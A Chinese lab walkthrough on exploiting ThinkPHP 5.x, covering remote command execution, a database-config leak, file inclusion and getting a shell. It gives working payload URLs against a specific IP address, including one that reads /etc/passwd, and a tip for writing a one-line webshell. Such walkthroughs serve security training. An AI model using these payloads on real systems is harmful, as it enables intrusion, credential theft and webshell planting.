常见框架漏洞攻略-ThinkPHP篇

漏洞名称:Thinkphp5x远程命令执行及getshell
第一步:开启靶场
第二步:准备工具
第三步:启动工具,进行漏洞检测
复制代码
#存在漏洞
1.目标存在tp5_invoke_func_code_exec_1漏洞

2.目标存在tp5_dbinfo_leak漏洞
  payload:
  http://47.103.81.25:8080?s=index/think\config/get&name=database.hostname
  hostname: 127.0.0.1, hostport: , database: , username: , password: root
  
3.目标存在tp5_file_include漏洞
  payload: 
  http://47.103.81.25:8080?s=index/\think\Lang/load&file=/etc/passwd
第四步:选择相应poc,执行tp5_invoke_func_code_exec_1漏洞
第五步:查看tp5_file_include漏洞
第六步:尝试GetShell
注意:

如果采取手工注入需注意:写一句话木马时如果是在双引号中,特殊字符$_GET会被转义而导致无法执行,如果非要使用双引号的话,需要在前添加转义字符

FROM IYU_

相关推荐
编程(变成)小辣鸡4 小时前
如何防止接口被恶意刷?
java·后端·网络安全
ylscode10 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
HackTwoHub18 小时前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .20 小时前
Hackerone-地址栏xss
网络安全·xss
数据知道20 小时前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全
txg66621 小时前
路径级持久化模糊测试:XSSky 如何精准击破 XSS 漏洞
深度学习·安全·web安全·网络安全·xss
红信鸽1 天前
2026 年 AI 钓鱼攻击现状与防御深度解析
网络安全
技术不好的崎鸣同学1 天前
[ACTF2020 新生赛]Include 思路及解法
算法·安全·web安全
你觉得脆皮鸡好吃吗1 天前
OAuth学习 下
网络·安全·web安全·网络安全学习
飞斯柯罗1 天前
[飞斯柯罗] 想了解什么是网络安全资产和 KMS?
网络·安全·web安全